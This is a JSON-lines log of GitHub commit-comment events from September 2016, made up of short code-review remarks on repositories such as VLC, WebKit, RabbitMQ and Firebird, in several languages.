{"id":"4617692942","type":"CommitCommentEvent","actor":{"login":"jacklizhenyao"},"repo":{"name":"jacklizhenyao/mygit"},"payload":{"comment":{"id":19172065,"position":1,"line":1,"path":"README.md","commit_id":"d6607fb2546b252278833931e60158d2f20f9dfd","created_at":"2016-09-26T13:14:16Z","updated_at":"2016-09-26T13:14:16Z","body":"想"}},"created_at":"2016-09-26T13:14:16Z"}
{"id":"4617693714","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mjocel/relaxr-landing-page"},"payload":{"comment":{"id":19172077,"position":223,"line":223,"path":"css/style.css","commit_id":"7c5515b8fe053cacaea15fcb34d44785b34007d2","created_at":"2016-09-26T13:14:25Z","updated_at":"2016-09-26T13:14:25Z","body":"Instead of repeating the same styles, you could've either given then a common class and add an additional one the bottom one to change the color or you could've comma-separated the selectors `.button-getitnow, .button-signupnow`."}},"created_at":"2016-09-26T13:14:25Z"}
{"id":"4617693738","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172078,"position":51,"line":1217,"path":"include/vlc/libvlc_media_player.h","commit_id":"0215c985894f57cdfc58938e363562be56961003","created_at":"2016-09-26T13:14:25Z","updated_at":"2016-09-26T13:14:25Z","body":"index is better, no ?"}},"created_at":"2016-09-26T13:14:25Z"}
{"id":"4617696104","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19172086,"position":19,"line":399,"path":"Source/WebKit/PlatformQt.cmake","commit_id":"e60cf699beb095879ab07d1e35ea9e47ea1e833a","created_at":"2016-09-26T13:14:51Z","updated_at":"2016-09-26T13:14:51Z","body":"No need to quote EXTRA_LIBS_NAMES components, like we do in file lists"}},"created_at":"2016-09-26T13:14:51Z"}
{"id":"4617696303","type":"CommitCommentEvent","actor":{"login":"Bouattitni"},"repo":{"name":"Bouattitni/Spycinvader"},"payload":{"comment":{"id":19172089,"position":6,"line":6,"path":"SpicyInvader.sln","commit_id":"07a975e075879caf9ca52d9bd953ddd5e08088d8","created_at":"2016-09-26T13:14:53Z","updated_at":"2016-09-26T13:14:53Z","body":"OH MON DIEU\r\n"}},"created_at":"2016-09-26T13:14:53Z"}
{"id":"4617696464","type":"CommitCommentEvent","actor":{"login":"michaelklishin"},"repo":{"name":"rabbitmq/rabbitmq-server"},"payload":{"comment":{"id":19172090,"position":16,"line":1353,"path":"src/rabbit_variable_queue.erl","commit_id":"5bbc6dd4d73aaf96173cc60a9ad7feb8ef695dc1","created_at":"2016-09-26T13:14:55Z","updated_at":"2016-09-26T13:14:55Z","body":"This should be `gc_run_count` or something else that's more specific."}},"created_at":"2016-09-26T13:14:55Z"}
{"id":"4617697703","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172095,"position":56,"line":1222,"path":"include/vlc/libvlc_media_player.h","commit_id":"0215c985894f57cdfc58938e363562be56961003","created_at":"2016-09-26T13:15:09Z","updated_at":"2016-09-26T13:15:09Z","body":"This comment is hard to understand"}},"created_at":"2016-09-26T13:15:09Z"}
{"id":"4617698730","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mjocel/relaxr-landing-page"},"payload":{"comment":{"id":19172100,"position":35,"line":35,"path":"index.html","commit_id":"7c5515b8fe053cacaea15fcb34d44785b34007d2","created_at":"2016-09-26T13:15:20Z","updated_at":"2016-09-26T13:15:20Z","body":"This should have been an link (`<a>` tag)."}},"created_at":"2016-09-26T13:15:20Z"}
{"id":"4617699172","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172102,"position":63,"line":1229,"path":"include/vlc/libvlc_media_player.h","commit_id":"0215c985894f57cdfc58938e363562be56961003","created_at":"2016-09-26T13:15:25Z","updated_at":"2016-09-26T13:15:25Z","body":"spaces not aligned"}},"created_at":"2016-09-26T13:15:25Z"}
{"id":"4617699737","type":"CommitCommentEvent","actor":{"login":"robUx4"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172103,"position":73,"line":1260,"path":"src/video_output/display.c","commit_id":"1f1751b7c485c522e4bdd422a8bf63f6842293ff","created_at":"2016-09-26T13:15:32Z","updated_at":"2016-09-26T13:15:32Z","body":"IIRC it's already locked in some calls, resutling in recursive locks (which I can now detect)"}},"created_at":"2016-09-26T13:15:32Z"}
{"id":"4617701771","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mjocel/relaxr-landing-page"},"payload":{"comment":{"id":19172112,"position":45,"line":45,"path":"index.html","commit_id":"7c5515b8fe053cacaea15fcb34d44785b34007d2","created_at":"2016-09-26T13:15:56Z","updated_at":"2016-09-26T13:15:56Z","body":"Was this meant to only wrap around the heading or did you close the tag too soon?"}},"created_at":"2016-09-26T13:15:56Z"}
{"id":"4617702689","type":"CommitCommentEvent","actor":{"login":"nieogar5"},"repo":{"name":"nieogar5/klasy"},"payload":{"comment":{"id":19172114,"position":null,"line":null,"path":null,"commit_id":"463f2f7e41952c9c2f8c09713a626da8e86843e1","created_at":"2016-09-26T13:16:07Z","updated_at":"2016-09-26T13:16:07Z","body":"Do zabawy klasami"}},"created_at":"2016-09-26T13:16:07Z"}
{"id":"4617704087","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19172118,"position":5,"line":19,"path":"Source/cmake/OptionsCommon.cmake","commit_id":"e60cf699beb095879ab07d1e35ea9e47ea1e833a","created_at":"2016-09-26T13:16:23Z","updated_at":"2016-09-26T13:16:23Z","body":"This is wrong, should be `NOT QT_STATIC_BUILD`"}},"created_at":"2016-09-26T13:16:23Z"}
{"id":"4617704780","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mjocel/relaxr-landing-page"},"payload":{"comment":{"id":19172120,"position":25,"line":25,"path":"index.html","commit_id":"7c5515b8fe053cacaea15fcb34d44785b34007d2","created_at":"2016-09-26T13:16:31Z","updated_at":"2016-09-26T13:16:31Z","body":"Let's be more descriptive with our class names."}},"created_at":"2016-09-26T13:16:31Z"}
{"id":"4617710313","type":"CommitCommentEvent","actor":{"login":"OlivierJaquemet"},"repo":{"name":"jalios/mediaelement"},"payload":{"comment":{"id":19172126,"position":null,"line":null,"path":null,"commit_id":"b0f2abfa29f1780427d118d523014a6ec076dad0","created_at":"2016-09-26T13:17:33Z","updated_at":"2016-09-26T13:17:33Z","body":"Thanks, see #1850 for french trad\r\n\r\nI won't be able to provide other languages in this time frame.\r\n"}},"created_at":"2016-09-26T13:17:33Z"}
{"id":"4617713371","type":"CommitCommentEvent","actor":{"login":"3TUSK"},"repo":{"name":"FrogCraft-Rebirth/FrogCraft-Rebirth"},"payload":{"comment":{"id":19172133,"position":null,"line":null,"path":null,"commit_id":"a0f0c1d4db3bb22afc3d81e7c2c8461c02e24e45","created_at":"2016-09-26T13:18:05Z","updated_at":"2016-09-26T13:18:05Z","body":"Hacky."}},"created_at":"2016-09-26T13:18:05Z"}
{"id":"4617713942","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172134,"position":40,"line":321,"path":"lib/video.c","commit_id":"0215c985894f57cdfc58938e363562be56961003","created_at":"2016-09-26T13:18:11Z","updated_at":"2016-09-26T13:18:11Z","body":"Why ?\r\nYou could factor vouts free and put it at the end after the if()"}},"created_at":"2016-09-26T13:18:11Z"}
{"id":"4617714874","type":"CommitCommentEvent","actor":{"login":"TaygunBoran"},"repo":{"name":"FAS16/Terning"},"payload":{"comment":{"id":19172136,"position":null,"line":null,"path":null,"commit_id":"47cd8724ba695a967787fbaca54da60cc039d272","created_at":"2016-09-26T13:18:21Z","updated_at":"2016-09-26T13:18:21Z","body":"Fejlen var at den slog en gang mindre end det ønskede. F.eks. hvis man indtastede 5 slag, slog den kun 4 gange. Den fejl rettes ved at indføre et = tegn efter < tegnet i linje 14. Den går altså fra at hedde i<1 til i<=1"}},"created_at":"2016-09-26T13:18:21Z"}
{"id":"4617718612","type":"CommitCommentEvent","actor":{"login":"robertkowalski"},"repo":{"name":"klaemo/docker-couchdb"},"payload":{"comment":{"id":19172143,"position":41,"line":30,"path":"2.0-dev/Dockerfile","commit_id":"f1637918eae2d6554a21e36a55d217365325f3b0","created_at":"2016-09-26T13:19:01Z","updated_at":"2016-09-26T13:19:01Z","body":"the removal of haproxy results in \r\n\r\n```\r\nERROR: for couchdb  oci runtime error: exec: \"--with-haproxy\": executable file not found in $PATH\r\nERROR: Encountered errors while bringing up the project.\r\n```\r\n\r\nfor us on travis, as we run couchdb with `./dev/run --with haproxy` "}},"created_at":"2016-09-26T13:19:01Z"}
{"id":"4617719398","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172144,"position":98,"line":379,"path":"lib/video.c","commit_id":"0215c985894f57cdfc58938e363562be56961003","created_at":"2016-09-26T13:19:09Z","updated_at":"2016-09-26T13:19:09Z","body":"same here for vouts free simplification"}},"created_at":"2016-09-26T13:19:09Z"}
{"id":"4617723347","type":"CommitCommentEvent","actor":{"login":"balsama"},"repo":{"name":"drupal-speedrun/speedrun"},"payload":{"comment":{"id":19172154,"position":null,"line":null,"path":null,"commit_id":"b4c4e2bd4a367b69d9714b8d52bf30bdd028281b","created_at":"2016-09-26T13:19:57Z","updated_at":"2016-09-26T13:19:57Z","body":"💣 "}},"created_at":"2016-09-26T13:19:57Z"}
{"id":"4617725200","type":"CommitCommentEvent","actor":{"login":"benbarnett"},"repo":{"name":"guidance-guarantee-programme/telephone_appointment_planner"},"payload":{"comment":{"id":19172157,"position":63,"line":89,"path":"app/assets/javascripts/calendar.es6","commit_id":"7c8fa43b2c0c912eb781aab96d51f166c7123646","created_at":"2016-09-26T13:20:19Z","updated_at":"2016-09-26T13:20:19Z","body":"You can probably use `let`s in this instance if you fancy a bit more es6 shizzle"}},"created_at":"2016-09-26T13:20:19Z"}
{"id":"4617725754","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19172158,"position":null,"line":null,"path":null,"commit_id":"3e0522667448484a65559c91f00245763dd2a57c","created_at":"2016-09-26T13:20:25Z","updated_at":"2016-09-26T13:20:25Z","body":"ASIHP-validation1 (shenb) - x86_64-MacOS-10.9-clang: OK (2319 of 2333 tests passed, 555 test warnings)\n\n * 569 tests had: AUD diffs.\n * 18 tests had: EIO diffs.\n * 8 tests had: ESO small diffs.\n * 10 tests had: ESO big diffs.\n * 4 tests had: MTR big diffs.\n * 12 tests had: Table big diffs.\n * 2 tests had: ERR diffs.\n * 15 tests had: RDD diffs.\n * 1 test had: MTD diffs.\n * 18 tests had: Table small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 2 tests had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.4%25-yellow.svg)</a> \n"}},"created_at":"2016-09-26T13:20:25Z"}
{"id":"4617728276","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172163,"position":59,"line":1228,"path":"src/video_output/display.c","commit_id":"1f1751b7c485c522e4bdd422a8bf63f6842293ff","created_at":"2016-09-26T13:20:52Z","updated_at":"2016-09-26T13:20:52Z","body":"stray space"}},"created_at":"2016-09-26T13:20:52Z"}
{"id":"4617729657","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172166,"position":57,"line":1226,"path":"src/video_output/display.c","commit_id":"1f1751b7c485c522e4bdd422a8bf63f6842293ff","created_at":"2016-09-26T13:21:08Z","updated_at":"2016-09-26T13:21:08Z","body":"line too long > 80 characters"}},"created_at":"2016-09-26T13:21:08Z"}
{"id":"4617739983","type":"CommitCommentEvent","actor":{"login":"k0459866"},"repo":{"name":"k0459866/CIS-121"},"payload":{"comment":{"id":19172204,"position":null,"line":null,"path":null,"commit_id":"f6d104947f609fdb6dd341373440ee9ce62d17e6","created_at":"2016-09-26T13:23:04Z","updated_at":"2016-09-26T13:23:04Z","body":"For the quiz, I don't really know why I didn't set the first variable as total, I guess I saw the word variable and I just set whatever equal to zero."}},"created_at":"2016-09-26T13:23:04Z"}
{"id":"4617747266","type":"CommitCommentEvent","actor":{"login":"HarelM"},"repo":{"name":"IsraelHikingMap/Site"},"payload":{"comment":{"id":19172250,"position":233,"line":1067,"path":"IsrealHiking.Web/controllers/InfoController.ts","commit_id":"f4f87ff76f1b6249992be477664c9ed09d81cd01","created_at":"2016-09-26T13:24:24Z","updated_at":"2016-09-26T13:24:24Z","body":"Right, I'll do it tonight then before publishing the changes to the production env."}},"created_at":"2016-09-26T13:24:24Z"}
{"id":"4617749494","type":"CommitCommentEvent","actor":{"login":"wkw934428709"},"repo":{"name":"wkw934428709/Hello-world"},"payload":{"comment":{"id":19172263,"position":null,"line":null,"path":null,"commit_id":"ad6824b647a0a01dd574d190774463653131862d","created_at":"2016-09-26T13:24:49Z","updated_at":"2016-09-26T13:24:49Z","body":"this is my first  push from PC "}},"created_at":"2016-09-26T13:24:49Z"}
{"id":"4617750850","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172279,"position":42,"line":622,"path":"src/video_output/vout_intf.c","commit_id":"1f1751b7c485c522e4bdd422a8bf63f6842293ff","created_at":"2016-09-26T13:25:04Z","updated_at":"2016-09-26T13:25:04Z","body":"check psz_string != NULL after sscanf ?"}},"created_at":"2016-09-26T13:25:04Z"}
{"id":"4617754893","type":"CommitCommentEvent","actor":{"login":"AMDmi3"},"repo":{"name":"AMDmi3/ja2-stracciatella"},"payload":{"comment":{"id":19172303,"position":5,"line":51,"path":"configure","commit_id":"d44b458a635b345becd4e440b1e3bcba010285e3","created_at":"2016-09-26T13:25:45Z","updated_at":"2016-09-26T13:25:45Z","body":"https://github.com/ja2-stracciatella/ja2-stracciatella/pull/390\r\nhttps://github.com/ja2-stracciatella/ja2-stracciatella/pull/391"}},"created_at":"2016-09-26T13:25:45Z"}
{"id":"4617758962","type":"CommitCommentEvent","actor":{"login":"felixkempf"},"repo":{"name":"scherersoftware/cake-monitor"},"payload":{"comment":{"id":19172332,"position":50,"line":54,"path":"src/Error/SentryHandler.php","commit_id":"5065eb734de191d875b9a94ae0a64ce3f1f07aeb","created_at":"2016-09-26T13:26:30Z","updated_at":"2016-09-26T13:26:30Z","body":"Code Styling beachten und array() durch [] ersetzen"}},"created_at":"2016-09-26T13:26:30Z"}
{"id":"4617759609","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172338,"position":null,"line":null,"path":null,"commit_id":"19914a8cd9276f57eee8f6fae0f624649187661c","created_at":"2016-09-26T13:26:36Z","updated_at":"2016-09-26T13:26:36Z","body":"squash with \"opengl: handle the viewpoint changes when rendering\" ?"}},"created_at":"2016-09-26T13:26:36Z"}
{"id":"4617760844","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":19172347,"position":4,"line":591,"path":"src/dsql/DdlNodes.h","commit_id":"d1c49980492e07d6616fed8010c13aaebe30a4fc","created_at":"2016-09-26T13:26:49Z","updated_at":"2016-09-26T13:26:49Z","body":"Please use \"enum name { ... }\" rather than C-style \"typedef enum { ... } name\"."}},"created_at":"2016-09-26T13:26:49Z"}
{"id":"4617761385","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":19172353,"position":null,"line":null,"path":null,"commit_id":"bb04ddb8a9f84bb04dfeaa99ab821752b5811d93","created_at":"2016-09-26T13:26:55Z","updated_at":"2016-09-26T13:26:55Z","body":"For ceylon/ceylon##6529."}},"created_at":"2016-09-26T13:26:55Z"}
{"id":"4617761747","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19172358,"position":null,"line":null,"path":null,"commit_id":"595249697374c3aeb7c4fb44fcde9ca3e996ecfc","created_at":"2016-09-26T13:26:59Z","updated_at":"2016-09-26T13:26:59Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#YjJ7CkwpTIur9ghVIlZ0pA"}},"created_at":"2016-09-26T13:26:59Z"}
{"id":"4617766739","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"ZatsepinMikhail/YaPyN_python"},"payload":{"comment":{"id":19172383,"position":1,"line":1,"path":".gitignore","commit_id":"01d4619b1c8b5a0c60771a6756e3d5d0be20603d","created_at":"2016-09-26T13:27:53Z","updated_at":"2016-09-26T13:27:53Z","body":"Плохо настроили .gitignore\r\nВ систему контроля версий не должны попадать собранные артефакты!\r\n*.exe\r\n*.pdb\r\nи вообще [Release] [Debug]\r\nпогуглите visual studio gitignore"}},"created_at":"2016-09-26T13:27:53Z"}
{"id":"4617768688","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":19172395,"position":90,"line":4202,"path":"src/dsql/parse.y","commit_id":"d1c49980492e07d6616fed8010c13aaebe30a4fc","created_at":"2016-09-26T13:28:13Z","updated_at":"2016-09-26T13:28:13Z","body":"You do need Jrd:: namespace in the type declarations in the top of this file, but not here in the action bodies."}},"created_at":"2016-09-26T13:28:13Z"}
{"id":"4617768883","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":19172398,"position":null,"line":null,"path":null,"commit_id":"bb04ddb8a9f84bb04dfeaa99ab821752b5811d93","created_at":"2016-09-26T13:28:15Z","updated_at":"2016-09-26T13:28:15Z","body":"For ceylon/ceylon#6529."}},"created_at":"2016-09-26T13:28:15Z"}
{"id":"4617777654","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"AndrewSondey/relaxr-landing-page"},"payload":{"comment":{"id":19172434,"position":31,"line":31,"path":"css/style.css","commit_id":"2da4c13db57a5cfbe100d301d5665ad779512d55","created_at":"2016-09-26T13:29:49Z","updated_at":"2016-09-26T13:29:49Z","body":"No need to set this again since it was set above."}},"created_at":"2016-09-26T13:29:49Z"}
{"id":"4617781688","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"PawlakArtur/CurriculumVitae"},"payload":{"comment":{"id":19172448,"position":12,"line":56,"path":"app/index.html","commit_id":"8b57f7dd37a3dbf1ba9199aecf15a2226ddf053f","created_at":"2016-09-26T13:30:33Z","updated_at":"2016-09-26T13:30:33Z","body":"Co tam w Vue.js robisz? Pochwal się 🤓"}},"created_at":"2016-09-26T13:30:33Z"}
{"id":"4617789868","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/vault-updater"},"payload":{"comment":{"id":19172477,"position":null,"line":null,"path":null,"commit_id":"c8115bb256e63a86b8c1ae3fd6bacbc05ccb30d5","created_at":"2016-09-26T13:32:01Z","updated_at":"2016-09-26T13:32:01Z","body":"++ nice generalization"}},"created_at":"2016-09-26T13:32:01Z"}
{"id":"4617794623","type":"CommitCommentEvent","actor":{"login":"Ordenkrieger"},"repo":{"name":"SarthakNarang/android_device_oneplus_onyx"},"payload":{"comment":{"id":19172499,"position":null,"line":null,"path":null,"commit_id":"2f27b4a8e9c13ded46c6e5aebd9c8a865c7a847b","created_at":"2016-09-26T13:32:52Z","updated_at":"2016-09-26T13:32:52Z","body":"LoL will we need this? "}},"created_at":"2016-09-26T13:32:52Z"}
{"id":"4617799243","type":"CommitCommentEvent","actor":{"login":"romansimakov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":19172510,"position":4,"line":591,"path":"src/dsql/DdlNodes.h","commit_id":"d1c49980492e07d6616fed8010c13aaebe30a4fc","created_at":"2016-09-26T13:33:42Z","updated_at":"2016-09-26T13:33:42Z","body":"ok"}},"created_at":"2016-09-26T13:33:42Z"}
{"id":"4617799821","type":"CommitCommentEvent","actor":{"login":"leagris"},"repo":{"name":"Blood-Asp/GT5-Unofficial"},"payload":{"comment":{"id":19172515,"position":null,"line":null,"path":null,"commit_id":"97d7efcc22b3c05f8631188bad33099cd4ce8c6b","created_at":"2016-09-26T13:33:49Z","updated_at":"2016-09-26T13:33:49Z","body":"Confirmed it fixes the issue."}},"created_at":"2016-09-26T13:33:49Z"}
{"id":"4617804564","type":"CommitCommentEvent","actor":{"login":"Konfekt"},"repo":{"name":"wikimatze/vimfiles"},"payload":{"comment":{"id":19172529,"position":null,"line":null,"path":null,"commit_id":"a3bfbd91d2e0ff698f892774ff3b5024135de01c","created_at":"2016-09-26T13:34:40Z","updated_at":"2016-09-26T13:34:40Z","body":"Irgendwo posten. Reddit? "}},"created_at":"2016-09-26T13:34:40Z"}
{"id":"4617808215","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"sanmato/empleartec-java"},"payload":{"comment":{"id":19172538,"position":5,"line":6,"path":"src/OperacionesComposite/src/demo/ComposedOperation.java","commit_id":"f82956ef83cd8f7cf0a74c7670c0a17976ea5638","created_at":"2016-09-26T13:35:19Z","updated_at":"2016-09-26T13:35:19Z","body":"Del lado izquierdo siempre conviene usar la interfaz. Es decir, List operations = new ArrayList"}},"created_at":"2016-09-26T13:35:19Z"}
{"id":"4617808393","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172539,"position":55,"line":237,"path":"test/libvlc/media_player.c","commit_id":"0215c985894f57cdfc58938e363562be56961003","created_at":"2016-09-26T13:35:20Z","updated_at":"2016-09-26T13:35:20Z","body":" undefined reference to symbol 'msleep'\r\nYou should add test_libvlc_media_player_LDADD = $(LIBVLCCORE) $(LIBVLC) \r\n\r\nBy the way, did you try to wait this event libvlc_MediaPlayerESSelected with a semaphore ?"}},"created_at":"2016-09-26T13:35:20Z"}
{"id":"4617814211","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/TBCPvP"},"payload":{"comment":{"id":19172549,"position":null,"line":null,"path":null,"commit_id":"d6240c0265679952e345347657673852eca49b61","created_at":"2016-09-26T13:36:23Z","updated_at":"2016-09-26T13:36:23Z","body":"This merge is 'legit'; https://github.com/Xadras/TBCPvP/pull/1"}},"created_at":"2016-09-26T13:36:23Z"}
{"id":"4617815241","type":"CommitCommentEvent","actor":{"login":"CheneyChao"},"repo":{"name":"CheneyChao/angular-rest-springsecurity"},"payload":{"comment":{"id":19172553,"position":null,"line":null,"path":null,"commit_id":"92dad55b99986cf46d651dcf75d29667d3428c96","created_at":"2016-09-26T13:36:33Z","updated_at":"2016-09-26T13:36:33Z","body":"merge change."}},"created_at":"2016-09-26T13:36:33Z"}
{"id":"4617816886","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github"},"payload":{"comment":{"id":19172556,"position":1,"line":1,"path":"asdasd","commit_id":"064b3eff38c5bb0e8438ece8842f6ae0af6a618c","created_at":"2016-09-26T13:36:52Z","updated_at":"2016-09-26T13:36:52Z","body":"asd"}},"created_at":"2016-09-26T13:36:52Z"}
{"id":"4617818687","type":"CommitCommentEvent","actor":{"login":"KevinW1998"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":19172560,"position":5,"line":462,"path":"Engine/scenes/scene_level.cpp","commit_id":"afa50516b83f2b26541f6193bf8e0719fbc78e3b","created_at":"2016-09-26T13:37:10Z","updated_at":"2016-09-26T13:37:10Z","body":"for-range loop is better"}},"created_at":"2016-09-26T13:37:10Z"}
{"id":"4617820524","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19172565,"position":null,"line":null,"path":null,"commit_id":"75d552690b4a640f3b7213846fcbcbb4e48c2118","created_at":"2016-09-26T13:37:30Z","updated_at":"2016-09-26T13:37:30Z","body":"@manucorporat No is best add deprecated in RC1 delete 😉 "}},"created_at":"2016-09-26T13:37:30Z"}
{"id":"4617821777","type":"CommitCommentEvent","actor":{"login":"Vitallium"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19172568,"position":5,"line":19,"path":"Source/cmake/OptionsCommon.cmake","commit_id":"e60cf699beb095879ab07d1e35ea9e47ea1e833a","created_at":"2016-09-26T13:37:44Z","updated_at":"2016-09-26T13:37:44Z","body":"QT_STATIC_BUILD is not defined here. OptionsCommon goes before OptionsQt"}},"created_at":"2016-09-26T13:37:44Z"}
{"id":"4617822102","type":"CommitCommentEvent","actor":{"login":"Ordenkrieger"},"repo":{"name":"SarthakNarang/Local_Manifest"},"payload":{"comment":{"id":19172570,"position":null,"line":null,"path":null,"commit_id":"a6ac22a606f9f733c8d10554baffd30874ea4c83","created_at":"2016-09-26T13:37:47Z","updated_at":"2016-09-26T13:37:47Z","body":"Hey do we need this repo too? To fix data? https://github.com/SarthakNarang/android_framework_opt_telephony"}},"created_at":"2016-09-26T13:37:47Z"}
{"id":"4617826714","type":"CommitCommentEvent","actor":{"login":"ashoknanda"},"repo":{"name":"ashoknanda/FinTech-NewsHub"},"payload":{"comment":{"id":19172582,"position":null,"line":null,"path":null,"commit_id":"f8969b969bc91dc4a812e42cf58c15f74cf10d2b","created_at":"2016-09-26T13:38:38Z","updated_at":"2016-09-26T13:38:38Z","body":"Created repository named FinTech-NewsHub"}},"created_at":"2016-09-26T13:38:38Z"}
{"id":"4617827361","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19172585,"position":null,"line":null,"path":null,"commit_id":"7aeffa3b3bde2c9c4e1499400cd286a1e4e815ec","created_at":"2016-09-26T13:38:44Z","updated_at":"2016-09-26T13:38:44Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1060)"}},"created_at":"2016-09-26T13:38:44Z"}
{"id":"4617831598","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19172595,"position":5,"line":19,"path":"Source/cmake/OptionsCommon.cmake","commit_id":"e60cf699beb095879ab07d1e35ea9e47ea1e833a","created_at":"2016-09-26T13:39:30Z","updated_at":"2016-09-26T13:39:30Z","body":"Right. Let's add option to disable thin archives"}},"created_at":"2016-09-26T13:39:30Z"}
{"id":"4617832120","type":"CommitCommentEvent","actor":{"login":"4RK4N"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19172597,"position":null,"line":null,"path":null,"commit_id":"70de5c3202bc806a98ca913a5a0419912d40644d","created_at":"2016-09-26T13:39:36Z","updated_at":"2016-09-26T13:39:36Z","body":"there is no default for this. or to be more exact: default is no purging. only if u set either as cmd line argument or in config ini. value is in hours so 72 is 3 days"}},"created_at":"2016-09-26T13:39:36Z"}
{"id":"4617835098","type":"CommitCommentEvent","actor":{"login":"LeOSW42"},"repo":{"name":"7Robot/TRR2016"},"payload":{"comment":{"id":19172604,"position":null,"line":null,"path":null,"commit_id":"dece811bd61b591cbdd973229bb861def09679c3","created_at":"2016-09-26T13:40:10Z","updated_at":"2016-09-26T13:40:10Z","body":":trollface: \r\nC'est pas un peu tard ?"}},"created_at":"2016-09-26T13:40:10Z"}
{"id":"4617837491","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19172612,"position":72,"line":72,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T13:40:35Z","updated_at":"2016-09-26T13:40:35Z","body":"I'm not sure what d6 means\r\n\r\nMy starter for 10 would be return a 403 if you are logged in and try to access something that you don't have permission to, 401 if you aren't logged in. We should probably return the status code for things that don't exist and things that you don't have permission on though, so either always 403 or always 404, so you can't figure out whether things that you don't have access to exist or not."}},"created_at":"2016-09-26T13:40:35Z"}
{"id":"4617838527","type":"CommitCommentEvent","actor":{"login":"wikimatze"},"repo":{"name":"wikimatze/vimfiles"},"payload":{"comment":{"id":19172614,"position":null,"line":null,"path":null,"commit_id":"a3bfbd91d2e0ff698f892774ff3b5024135de01c","created_at":"2016-09-26T13:40:46Z","updated_at":"2016-09-26T13:40:46Z","body":"am besten als Blog-Eintrag auf deiner Seite und dann bitte an https://twitter.com/vimlinks - Andrew shared gerne. Die Sache hast du ja eigentlich auch schon auf unser vimmetup vorgestellt, wo wir zu dritt waren."}},"created_at":"2016-09-26T13:40:46Z"}
{"id":"4617841876","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19172621,"position":1,"line":1,"path":"sdfsadf","commit_id":"7aeffa3b3bde2c9c4e1499400cd286a1e4e815ec","created_at":"2016-09-26T13:41:22Z","updated_at":"2016-09-26T13:41:22Z","body":"s"}},"created_at":"2016-09-26T13:41:22Z"}
